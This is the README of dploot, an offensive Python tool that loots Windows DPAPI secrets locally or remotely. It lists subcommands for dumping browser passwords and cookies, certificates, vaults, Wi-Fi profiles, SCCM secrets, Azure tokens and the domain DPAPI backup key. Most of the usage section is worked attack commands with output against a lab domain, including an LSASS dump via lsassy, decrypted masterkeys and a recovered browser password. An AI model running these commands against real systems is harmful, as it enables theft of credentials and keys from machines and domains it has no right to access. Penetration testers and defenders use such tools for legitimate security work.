Dploot
DPAPI looting remotely and locally in Python
Install / Use
/learn @zblurx/DplootREADME
dploot
dploot is Python rewrite of SharpDPAPI written un C# by Harmj0y, which is itself a port of DPAPI from Mimikatz by gentilkiwi. It implements all the DPAPI logic of these tools, but this time it is usable with a python interpreter and from a Linux environment.
If you don't know what is DPAPI, check out this post.
Table of Contents
Installation
You can install dploot directly from PyPI with pipx:
pipx install git+https://github.com/zblurx/dploot.git
OR
pipx install dploot
On Kali Linux, you can install dploot from the repositories:
sudo apt install python3-dploot
Usage
dploot (https://github.com/zblurx/dploot) v3.1.2 by @_zblurx
usage: dploot [-h]
{backupkey,blob,browser,certificates,credentials,machinecertificates,machinecredentials,machinemasterkeys,machinetriage,machinevaults,masterkeys,mobaxterm,rdg,sccm,triage,vaults,wam,wifi} ...
DPAPI looting locally remotely in Python
positional arguments:
{backupkey,blob,browser,certificates,credentials,machinecertificates,machinecredentials,machinemasterkeys,machinetriage,machinevaults,masterkeys,mobaxterm,rdg,sccm,triage,vaults,wam,wifi}
Action
backupkey Backup Keys from domain controller
blob Decrypt DPAPI blob. Can fetch masterkeys on target
browser Dump users credentials and cookies saved in browser from local or remote target
certificates Dump users certificates from local or remote target
credentials Dump users Credential Manager blob from local or remote target
machinecertificates
Dump system certificates from local or remote target
machinecredentials Dump system credentials from local or remote target
machinemasterkeys Dump system masterkey from local or remote target
machinetriage Loot SYSTEM Masterkeys (if not set), SYSTEM credentials, SYSTEM certificates and SYSTEM vaults from local or remote target
machinevaults Dump system vaults from local or remote target
masterkeys Dump users masterkey from local or remote target
mobaxterm Dump Passwords and Credentials from MobaXterm
rdg Dump users saved password information for RDCMan.settings from local or remote target
sccm Dump SCCM secrets (NAA, Collection variables, tasks sequences credentials) from local or remote target
triage Loot Masterkeys (if not set), credentials, rdg, certificates, browser and vaults from local or remote target
vaults Dump users Vaults blob from local or remote target
wam Dump users cached azure tokens from local or remote target
wifi Dump wifi profiles from local or remote target
options:
-h, --help show this help message and exit
Kerberos
dploot can authenticate with Kerberos. Simply use -k option. If you want to use a cached ticket, use -use-kcache option.
How to use
The goal of dploot is to simplify DPAPI related loot from a Linux box. As SharpDPAPI, how you use this tool will depend on if you compromised the domain or not.
As a local administrator on the machine
Whenever you are local administrator of a windows computer, you can loot machine secrets, for example with machinecertificates (or any other Machine Triage commands, or wifi command):
$ dploot machinecertificates -d waza.local -u Administrator -p 'Password!123' -t 192.168.56.14 -quiet
[-] Writting certificate to DESKTOP-OJ3N8TJ.waza.local_796449B12B788ABA.pfx
With offline access to the Windows' filesystem
A different way of gaining local administrator access to a system, for instance via physical access, extracting the drive and mounting the filesystem directly on your machine. To use this mode, specify LOCAL as the target. By default the target filesystem is expected to be the current directory, you can specify a different path with -root:
$ dploot sccm -root /media/C_drive/ -t LOCAL
[*] Connected to LOCAL as \ (admin)
It can still be useful to give valid username and password as arguments, which will be used to decrypt masterkeys (see the instructions in User Triage below):
$ dploot masterkeys -root /mnt -u bob -p Password -t LOCAL
[*] Connected to LOCAL as \bob (admin)
As a domain administrator (or equivalent)
If you have domain admin privileges, you can obtain the domain DPAPI backup key with the backupkey command. This key can decrypt any DPAPI masterkeys for domain users and computers, and it will never change. Therefore, this key allow attacker to loot any DPAPI protected password realted to a domain user.
To obtain the domain backupkey, you can use backupkey command:
$ dploot backupkey -d waza.local -u Administrator -p 'Password!123' -t 192.168.56.112 -quiet
[-] Exporting domain backupkey to file key.pvk
Then you can loot any user secrets stored on a windows domain-joined computer on the network, for example with certificates command (or any other User Triage commands):
$ dploot certificates -d waza.local -u Administrator -p 'Password!123' -t 192.168.56.14 -pvk key.pvk -quiet
[-] Writting certificate to jsmith_waza.local_C0F800ECBA7BE997.pfx
[-] Writting certificate to jsmith_waza.local_D0C73E2C04BEAAB0.pfx
[-] Writting certificate to m.scott_waza.local_EB9C21A5642D4EBD.pfx
Not as a domain administrator
If domain admin privileges have not been obtained (yet), using Mimikatz' sekurlsa::dpapi command will retrieve DPAPI masterkey {GUID}:SHA1 mappings of any loaded master keys (user and SYSTEM) on a given system (tip: running dpapi::cache after key extraction will give you a nice table). If you change these keys to a {GUID1}:SHA1 {GUID2}:SHA1... type format, they can be supplied to dploot to triage the box. Use can also use lsassy to harvest decrypted masterkeys:
$ lsassy -u Administrator -p 'Password!123' -d waza.local -t 192.168.56.14 -m rdrleakdiag -M masterkeys
[+] 192.168.56.14 Authentication successful
[+] 192.168.56.14 Lsass dumped in C:\Windows\Temp\ff32F.fon (57121318 Bytes)
[+] 192.168.56.14 Lsass dump deleted
[+] 192.168.56.14 WAZA\DESKTOP-OJ3N8TJ$ [NT] 0e43c22a4b09520cf79ca19a9e1bbec7 | [SHA1] 2ce587ab64aa3488c5ed412ca1e554d0f8e5a411
(snip)
[+] 192.168.56.14 5 masterkeys saved to /data/masterkeys
Then you can use this masterkey file to loot the targeted computer, for example with browser command (or any other User Triage commands):
$ dploot browser -d waza.local -u Administrator -p 'Password!123' -t 192.168.56.14 -mkfile /data/masterkeys
[*] Connected to 192.168.56.14 as waza.local\Administrator (admin)
[*] Triage Browser Credentials for ALL USERS
[MSEDGE LOGIN DATA]
URL:
Username: zblurx@gmail.com
Password: Waza1234
You can also dump masterkey hashes with -hashes-outputfile option of dploot masterkeys
Commands
User Triage
masterkeys
The masterkeys command will get any user masterkey file and decrypt them with -passwords FILE combo of user:password, -nthashes combo of user:nthash or a -pvk PVKFILE domain backup key. It will return a set of masterkey {GUID}:SHA1 mappings. Note that it will try to use password or nthash that you used to connect to the target even if you don't specify corresponding options. You can eventually use -hashes-outputfile to get every masterkey hashes in Hashcat/JtR format in order to crack cleartext password.
With domain backupkey:
$ dploot masterkeys -d waza.local -u Administrator -p 'Password!123' -t 192.168.57.5 -pvk key.pvk
[*] Connected to 192.168.57.5 as waza.local\Administrator (admin)
[*] Triage ALL USERS masterkeys
{d305b55b-f0ca-40cf-b04c-3620aa5da427}:6f45f9ee77014df8a68104abd0e8d5eadb3d9f22
{d37fa151-d670-4c58-9d70-3233b4918942}:8709574524ad35ef0b3a114b93990f8490d86cba
{68e05bd7-9de9-46f0-95e3-b5036baa49e9}:2d87a923d05534da67d449cbad9a7390d019910a
With password:
$ cat passwords
jsmith:Password#123
$ dploot masterkeys -d waza.local -u jsmith -p 'Password#123' -t 192.168.56.14 -passwords passwords
[*] Connected to 192.168.56.14 as waza.local\jsmith
